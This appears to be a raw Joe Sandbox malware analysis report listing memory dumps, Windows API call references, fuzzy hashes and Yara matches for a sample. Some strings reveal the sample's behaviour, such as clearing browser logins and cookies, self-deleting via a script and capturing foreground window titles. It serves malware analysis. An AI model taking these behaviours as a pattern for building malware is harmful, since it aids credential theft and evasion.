                                                                                                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • new.LIBCMT ref: 10006C8E
                                                                                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 10006D68
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
                                                                                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 10006D6D
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3339364867-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 2e818ad779f7f3d03d5c84d06b9865814cbd875c5e08a6123d96dc269186004b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4d0b3fd10050543d74c0a9d0191834ad5b053cb97790e6a37b58efb3ad3a7c81
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e818ad779f7f3d03d5c84d06b9865814cbd875c5e08a6123d96dc269186004b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3310775B001059FEB04DF68CDC196977E6EF483C0724816AE80A8F24DD731EE51C791
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,02836FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 02838731
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 028387BA
                                                                                                                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 028387CC
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 028387D5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02835702
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b01d329ec73a34220503c2979a70116614182fce770f399b3eb98151aa875a1a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: cd650088742f2dae98708e0c5bad750f5748c58fc7eac35f83a0eae5349f86fa
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b01d329ec73a34220503c2979a70116614182fce770f399b3eb98151aa875a1a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D231C17EA0020AABDF269F64DC84DAF7BA6EB44714F140528FC08D7190EB35D955CBD1
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,0BFC45C6,00000008,00000000,00000000,1000310F,100147D8,100147D8,?,00000001,00000008,0BFC45C6,00000001,1000310F,00000000), ref: 1001CE6B
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1001CEF4
                                                                                                                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1001CF06
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 1001CF0F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A9F: RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5213e88b9c10004400c7bcab2351b664c992673cec8c149454ec87b9edb94029
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 21883209d994697de3a7c675a4d248267bdfb4ce84dfd65b2647a05d58818af6
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5213e88b9c10004400c7bcab2351b664c992673cec8c149454ec87b9edb94029
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50319032A0021AABEB15CF64CC85DAE7BE6EF40750F150169FC14DA191EB35DDA1DBA0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                                                                                                                                                                                                                                              • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                                                                                                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • new.LIBCMT ref: 100083A9
                                                                                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 1000843E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
                                                                                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 10008443
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseOpenQuerySleepValue
                                                                                                                                                                                                                                                                                                                              • String ID: @CG$exepath$BG
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                                                                                                                                                                              • String ID: [ $ ]
                                                                                                                                                                                                                                                                                                                              • API String ID: 3309952895-93608704
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 94898d049807b5b7b9a9a00ee9d94e571809afb3060b307ff591eca3c25171bd
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 884b77faaa60fb736012887943be30d2742787962025037229812ea18f618e82
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94898d049807b5b7b9a9a00ee9d94e571809afb3060b307ff591eca3c25171bd
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E119F325042005BD218BB26DD17AAEB7A8AF50708F40047FF542221D3EF39AE1986DF
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B61C
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3604237281-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3b94612a358327762e597db0d4245ee78264fa841ead315e3e24d1cb8b3ec7b7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F01F5712082147FE6104F28AC89EBB739DEB96379F14063AF952C22C0D765CC8596BE
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 34adadb741f02ad6c977a9672503190435d460153bd3688253a2ab8711a07be4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6a77029f59283c4afc38e459ca5b29238c6884d098e1e5420c53c581ecba7eff
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34adadb741f02ad6c977a9672503190435d460153bd3688253a2ab8711a07be4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B0144B2209B26FEE61186B86CC0C1B338CDF452F67BE0325F4305E1D1EA72CD804560
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
                                                                                                                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00438134
                                                                                                                                                                                                                                                                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                                                                                                                                                                                                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 737400349-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00414BBD,00000000,00000000,?,004471C7,00414BBD,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,004471C7,00414BBD,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                                                                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,00414BBD,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,02831D66,00000000,00000000,?,02835C88,02831D66,00000000,00000000,00000000,?,02835E85,00000006,FlsSetValue), ref: 02835D13
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,02835C88,02831D66,00000000,00000000,00000000,?,02835E85,00000006,FlsSetValue,0283E190,FlsSetValue,00000000,00000364,?,02835BC8), ref: 02835D1F
                                                                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02835C88,02831D66,00000000,00000000,00000000,?,02835E85,00000006,FlsSetValue,0283E190,FlsSetValue,00000000), ref: 02835D2D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,10016C28,?,00000000,00000000,00000000,?,10016E99,00000006,FlsSetValue), ref: 10016CB3
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,10016C28,?,00000000,00000000,00000000,?,10016E99,00000006,FlsSetValue,10023FF8,10024000,00000000,00000364,?,10016B4E), ref: 10016CBF
                                                                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10016C28,?,00000000,00000000,00000000,?,10016E99,00000006,FlsSetValue,10023FF8,10024000,00000000), ref: 10016CCD
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 72b5330a57eb74a40baf9a61d40bdd9d3755c7007a9fc1dc3c23e7b3821a2f67
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ff803806bf35457a8c9509914e7b957bc79ab392df546f2ce6f943c9b73d3fe4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72b5330a57eb74a40baf9a61d40bdd9d3755c7007a9fc1dc3c23e7b3821a2f67
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A012B32215233BBD721CBA98C84E667B99EF197E17324630FE86DB140D731D892C6E0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004C), ref: 00418529
                                                                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                                                                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004E), ref: 00418535
                                                                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004F), ref: 0041853B
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 4116985748-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 1000BCF1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000C329: ___AdjustPointer.LIBCMT ref: 1000C373
                                                                                                                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 1000BD08
                                                                                                                                                                                                                                                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 1000BD1A
                                                                                                                                                                                                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 1000BD3E
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2633735394-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 740bbfef3014248a86bebd331052a0092870a23a7dde377906f42e64fb98e74f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6ee525c0efd99494f93368286b9b993f9fe821045e638fee8bb9f3aa3f758cd1
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 740bbfef3014248a86bebd331052a0092870a23a7dde377906f42e64fb98e74f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30014836000609BBEF129F55CC01EDE7BBAFF48794F118015FE1862124D772E8A1EBA0
                                                                                                                                                                                                                                                                                                                              APIs
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
